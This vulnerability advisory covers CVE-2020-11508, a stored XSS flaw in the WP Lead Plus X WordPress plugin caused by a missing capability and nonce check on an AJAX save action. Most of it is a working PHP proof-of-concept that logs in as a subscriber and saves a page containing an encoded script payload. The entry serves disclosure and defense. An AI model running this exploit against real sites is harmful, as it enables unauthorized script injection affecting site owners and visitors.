WP Lead Plus X < 0.99 - Authenticated Stored Cross-Site Scripting (XSS)



Description
WP Lead Plus X is a WordPress plugin that allows site owners to create custom landing and “squeeze” pages, complete with its own page builder interface capable of inserting custom JavaScript. Unfortunately, this page builder interface also relied on an unprotected AJAX action core37_lp_save_page which lacked a capability check and a nonce check in order to save and update pages.
Proof of Concept
<?php
// Settings
$url = $argv[1]; //URL of the site
$wp_user = $argv[2]; //Subscriber Username
$wp_pass = $argv[3]; //Subcriber Password
$urlbits = parse_url($url);

$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';

// Log in as subscriber
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-login.php');
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'wp-submit'  => 'Log+In',
    'testcookie' => '1'
)));
$output = curl_exec($ch);
curl_close($ch);

//Insert a page with stored XSS
$params=array(
'pageContent' => "%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-lp-172110%22%20style%3D%22width%3A%20700px%3B%22%20class%3D%22c37-lp%20c37-step%20ui-sortable%20ui-droppable%22%3E%0A%20%20%20%20%3Csection%20class%3D%22c37-section%20ui-sortable%20ui-droppable%22%20id%3D%22c37-section-643520%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-row%20d-flex%20flex-row%22%20id%3D%22c37-row-326243%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-col-md-12%20c37-col-sm-12%20c37-col-12%22%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-box-865567%22%20class%3D%22c37-box%20flex-column%20d-flex%20flex-column%20ui-sortable%20ui-droppable%22%3E%0A%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%0A%3Cdiv%20data-original%3D%22false%22%20data-c37-type%3D%22code%22%20class%3D%22c37-lp-element%20c37-item-element%20ui-draggable-handle%22%20id%3D%22c37-code-108583%22%3E%0A%20%20%20%20%3Cdiv%20data-content%3D%22%22%20class%3D%22c37-code-container%22%3E%3Cscript%3Ealert('xss!')%3B%3C%2Fscript%3E%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%0A%3C%2Fdiv%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%20%20%20%20%3C%2Fsection%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20",
'pageID' => isset($argv[4]) ? $argv[4] : '0',
'pageSlug'=>'poctest',
'pageTitle' => 'PoCTest',
'pageSettings' => '{"isVariant":false,"isPage":true,"variantPageID":0,"webFonts":[],"modelsJSON":{"c37-section-643520":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","layout":12,"containerClass":"","etype":"section","editingElementID":"c37-section-643520"},"c37-row-326243":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","horizontal":"","vertical":"","layout":"12","etype":"row","editingElementID":"c37-row-326243"},"c37-box-865567":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","horizontal":"","vertical":"","size":{"desktop":12,"tablet":12,"phone":12},"direction":"flex-column","etype":"box","editingElementID":"c37-box-865567"},"c37-code-108583":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","code":"%3Cscript%3Ealert(\'xss!\')%3B%3C%2Fscript%3E","etype":"code","editingElementID":"c37-code-108583"},"page":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","width":"700","codes":{"trackingCode":"","experimentCode":"","beforeBodyClosing":"","afterBodyOpening":"","metaCode":"","customCSSCode":""},"pageTitle":"PoC","pageSlug":"poc","weight":"1","cssID":"c37-lp-172110","editingElementID":"page","etype":"page"}},"flipCountdown":{},"simpleCountdown":{},"previewURL":"","imageSliders":{},"weight":1,"elementsActions":{},"jsCodes":{},"compiledCSS":""}',
'action' => 'core37_lp_save_page'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-admin/admin-ajax.php');
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded; charset=UTF-8', 'Connection: close'));
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
$output = curl_exec($ch);
echo $output;
curl_close($ch);

Affects Plugin

References

CVE 2020-11508
URL https://www.wordfence.com/blog/2020/04/critical-vulnerabilities-in-the-wp-lead-plus-x-wordpress-plugin/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Ramuel Gall (Wordfence)
Submitter Ramuel Gall
Views 1322
Verified No
WPVDB ID 10167

Timeline

Publicly Published 2020-04-07 (about 2 months ago)
Added 2020-04-07 (about 2 months ago)
Last Updated 2020-04-08 (about 2 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin